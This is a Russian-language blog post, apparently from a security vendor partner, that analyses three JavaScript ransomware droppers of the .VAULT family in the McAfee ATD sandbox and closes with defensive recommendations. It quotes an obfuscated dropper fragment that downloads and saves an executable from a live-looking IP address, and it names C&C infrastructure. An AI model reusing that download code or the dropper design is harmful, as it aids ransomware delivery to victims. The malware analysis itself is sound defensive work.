McAfee ATD vs .VAULT

vault_js_ATD

Эффективность “песочницы” McAfee ATD на примере противодействия средствам доставки криптолокеров.

В последнее время опять активизировались как случайные так и целевые рассылки с новыми образцами криптолокеров. Как я уже писал ранее, теперь злоумышленники для обхода систем защиты используют в качестве dropper`ов обфусцированный js. Во всем этом есть даже маленький элемент соц. инженерии – чтобы жертва кликала на вложении активнее, js скрипты имеют название вида “Акт Сверки_ХХХХ“, “Рабочие документы_ХХХХ“, “Resume_%name%” и т.д. При чем, в ряде случаев в названии использовались имена компаний-подрядчиков, с которыми компания-жертва поддерживала деловые отношения. Согласитесь, это пока не персонализированный фишинг основанный на OSINT, но ведь все еще впереди. Тем более, что кликают и так отменно, как в ГОС структурах так и в коммерческих компаниях.

Давайте рассмотрим результаты автоматического анализа трех крайних семплов. Детальные отчеты в формате PDF прилагаются.

Тип угрозы: .VAULT

Класс: Ransomaware

Канал доставки: Фишинг

Особенности: js, компактный размер

Результаты анализа resume.js_summary (PDF 40 KB):

resume1

Как видим, сканирование заняло 43 секунды, из которых 28 потребовалось для клонирования тестовой ВМ. Т.е. четкий однозначный результат оператор системы безопасности получил в автоматическом режиме меньше чем за минуту. При этом, по моей просьбе, проверка по сигнатурам и облаку не проводилась. Проверялось именно поведение “резюме”.  ATD выдало семплу 5 ть балов опасности по пятибальной шкале. Смотрим за что:

resume_2

ATD сразу обратил внимание на то, что это файл класса js. Индикаторами опасности в данном случае послужили: установление сетевого соединения и загрузка исполняемого кода.

Стоит обратить внимание, что механизм “песочницы” тоже совершенствуется, чтобы не отставать в этой “гонке вооружений”. Так, функционал проверки js был добавлен в ATD при обновлении до версии 3.4.8 еще в июле этого года, когда новые образцы еще не получили такого массового распространения. Яркий пример развития решения и как результат упреждения угроз:

With this release, following file types are also supported for static and dynamic analysis. .cab, .java
script, .bat, .cmd and .vbs.

Давайте же посмотрим, а откуда загружался основной модуль?

resume_3

Вот так наш загадочный кусок кода:

httDLZCEGHQTDBr”/*eWHggwxvhxLyVfWYHyyObaEAx*/.replace(“tDLZCEGHQTDBr”,”tp://”);
YqTmIx(eWHggwxvhx + “46.30”+”.43.183/sy”+”ria.”+”e”+”x”+”e”, “144157771.exe“, 1);

Превращается в ссылку вида:

46.30.43.183/SYRIA.EXE

Скрипт загружает этот исполняемый модуль и сохраняет его по пути %TEMP% с именем 144157771.exe

Если копнуть глубже и посмотреть на данные IP адреса, где размещается файловый сервер злоумышленников:

WHOIS : 46.30.43.183
inetnum: 46.30.43.0 – 46.30.43.255
netname: EUROBYTE-NET
remarks: INFRA-AW
descr: Eurobyte VPS
country: RU
role: EuroByte LLC
address: 42 Lyublinskaya str
address: 109387 Moscow
address: RU
remarks: EuroByte contacts

Оставлю этот момент без комментариев.

Важно другое – ATD является эффективной контрмерой для борьбы с тем, что принято называть целевыми атаками (APT) и различными типами угроз, которые используют комбинацию 0-day уязвимостей и соц. инженерии. Ransomware это лишь частный пример, который я выбрал, потому, что многие заказчики задают вопрос: “Как мы можем избежать потери своих данных и простоев в работе?“.

###

Следующий образец:

Тип угрозы: .REVAULT

Класс: Ransomaware

Канал доставки: Фишинг

Особенности: js, двойное расширение файла

Результаты анализа sample2.js_summary (PDF 42 KB):

sample2_1sample2_2

Данный семпл отличается от т.н. резюме чуть большим объемом кода (3,6 КБ против 2КБ). И сам C&C расположен на другом сервере. Зато при запуске данного семла четко прослеживается загрузка шифрующего модуля в %TEMP%. Запомните этот момент, я к нему еще вернусь. Если взглянуть на данные регистрации домена, видно что тут подошли с фантазией и денег не пожалели не только за имя домена но еще и за сервис сокрытия информации о владельце (WhoisGuard):

revault.me
Domain Name:REVAULT.ME
Domain Create Date:23-Oct-2015 19:43:32 UTC
Domain Last Updated Date:28-Oct-2015 10:32:13 UTC
Domain Expiration Date:23-Oct-2016 19:43:32 UTC
Registrant ID:QFB4RJG41541YA03
Registrant Name:WhoisGuard Protected
Registrant Organization:WhoisGuard, Inc.
Registrant Address:P.O. Box 0823-03411
Registrant Address2:
Registrant Address3:
Registrant City:Panama
Registrant State/Province:Panama

###

Ну и напоследок давайте рассмотрим версию, которая была предшественником первых двух. Я говорю так не только потому, что это один из первых семплов, которые мне удалось добыть “в полях”, но еще и потому, что размер его существенно выше (~ 170KB) да и “шуму” он производит больше нежели первых два примера.

Следующий образец:

Тип угрозы: .VAULT_RC

Класс: Ransomaware

Канал доставки: Фишинг

Особенности: js, умная начинка

Результаты анализа sample1.js_summary (PDF 70 KB):

sample1_1sample1_2

Ба, да тут количество кода компенсируется наличием антиотладочных механизмов, которые тем не менее, не помешали ATD выполнить анализ. Тут основным индикатором опасности послужил не JS, а инжект в системные процессы. Кроме того, данный модуль самодостаточен, в отличие от двух первых, код основной части у него внутри. И не смотря на столь угрожающую начинку, Modus Operandi (образ действия) тот же – записать .exe в %TEMP% и запустить. Я считаю, что не смотря на в чем-то более совершенный подход, в угоду компактности и универсальности, в последующих версиях эта умная начинка была выброшена в угоду уменьшения веса приманки, а сами файлы стали размещать на C&C. Так умнее, потому, что если payload внутри, то код статичен и рано или поздно его контрольные суммы как и куски кода будут “засвечены”, а пустой js дроппер, который имеет лишь ссылку на dns имя C&C имеет больше шансов на выживание – во-первых C&C можно переместить, а во вторых по ссылке может загружаться измененный код. Время покажет был я прав или нет.

Надеюсь небольшой экскурс во внутренностях вымогателей пришелся читателю по душе.

###

Общие рекомендации по контрмерам (на основе вышеизложенного):

  1. Наличие резервных копий, особенно если вы пока не обзавелись таким мощным инструментом как ATD;
  2. Жесткий фильтр вложений входящей почты (чтобы js до пользователя даже не долетал);
  3. Правильные настройки защиты на уровне конечных точек (либо HIPS, либо блокировка запуска .js и .exe из %TEMP%) – между прочим, самое простое, но от того не менее действенное решение;
  4. Использование McAfee ATD позволит компании защититься как от мутирующего кода Ransomware в частности, так и от широкого спектра угроз, особенно в первые часы распространения, когда ни один движок из 56-ти по вирустоталу ничего не знают о семпле.
  5. Сотрудникам ИБ подразделений обязательно проведение разъяснительных бесед с персоналом на тему “нельзя просто так клацать на все, что попало”.

Ну и в качестве бонуса, если кому интересны мои мысли как попытка аналитики происходящего прошу:

PS

Индустрия Ransomware демонстрирует активное развитие и серьезные объемы монетизации. Если вспомнить с чего все начиналось, то сложно поверить, что в начале пути мы имели дело с относительно “безобидным” WinLock, которого продвинутые пользователи могли обезвредить самостоятельно, и который к тому же просил не в пример меньше денег чем его “наследники”. Все изменилось, когда злоумышленники освоили “правильную” (надежную) криптографию. Я имею ввиду AES, RSA и эллиптические кривые вместо банального XOR со сдвигом. Так началась эра т.н. вымогателей-шифровальщиков. Согласитесь, есть изрядная доля иронии в том, что алгоритмы призванные в первую очередь защищать пользовательскую информацию от НСД стали эксплуатироваться для вымогательства денег. Мы получили CryptoLocker и его производные (CTB-Locker, CryptoWall etc). Суммы выкупа поползли вверх. Это дало толчок к развитию технической составляющей: C&C переехали в “теневую” зону Сети (TOR, I2P), средства доставки (о которых шла речь в данной заметке) стали совершенствоваться, а сам процесс отъема честно заработанных сделали максимально комфортным для пользователя – вот тебе инструкция на нескольких языках, а вот тебе учетная запись в личном кабинете и вот онлайн-поддержка. И ведь они (злоумышленники) своего добились. Многие жертвы идут на сотрудничество, т.к. бэкапы делать не приучены, настройки антивируса “by default”, а зашифрованная информация в 99% случаев была в единственном экземпляре. И если домашний пользователь еще может смириться с утерей медиа контента, то в случае заражения компьютеров на предприятии альтернатив почти нет. Этим вымогатели и пользуются. Без ключей получить файлы обратно можно только тупым перебором, а это даже с учетом облачных мощностей несколько лет. К чему я это? Спрос, как известно, рождает предложение. Чем больше жертв будут сотрудничать, тем активнее будет развиваться данная отрасль. Сами “семплы” будут эволюционировать. Они уже это делают: вначале это был .SCR в архивной “обертке”, потом .EXE в MS Word “обертке” либо с двойным расширением, теперь своеобразным трендом является использование Java Script. Дальше будет что-то новое. А кроме того, список поддерживаемых платформ будет расширяться. Стоит задуматься и стать осторожнее.

По поводу платформ:

10.09.15 – New Android ransomware locks out victims by changing lock screen PIN, $500

09.11.15 – New encryption ransomware targets Linux systems, $500

Про вымогатель на андроиде я уже писал в одном из своих дайджестов. А вот про ransomware для Linux – это на моей памяти “первая ласточка”. И пуская он не идеален и требует запуска от имени root. Но, но во-первых, мы все очень хорошо знаем как некоторые админы любят сидеть под root`ом, а во-вторых, это ведь только начало, дальше будет интересней ;)

Во общем, будьте осторожны и внимательны при использовании высоких технологий.

PPS

Если в современной “гонке вооружений” (а-ля антивирус против ransomware) мы будем полагаться только на сигнатурный анализ – всегда будет фрейм (задержка) между т.н. “нулевым пациентом” (первым зараженным) и сигнатурами. Другими словами – для сигнатурного анализа всегда будет “люфт” по времени, в течении которого антивирус Х не будет обнаруживать угрозу. Т.е. задержка будет составалять где-то +/- от 2-5 часов до суток (пока образец свежей версии вируса не попадет аналитикам в руки). Я сейчас пишу это без привязки к какому-бы-то ни было вендору/продукту. Это мое личное наблюдение/мой скромный опыт. Понимание этого факта приводит к тому, что проблему ransomware нужно решать комплексно, с привлечением как технических контрмер так и административных мероприятий.

Повторюсь:

  • наличие резервных копий;
  • жесткие фильтры вложений;
  • анализ поведения/блокирование опасных действий на конечных точках (запрет запуска .exe и скриптов из %TEMP% как один из примеров);
  • проведение профилактических бесед с сотрудниками;
  • использование механизмов динамического анализа кода

VR

Tags: , , , , , , , , , , , , , , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: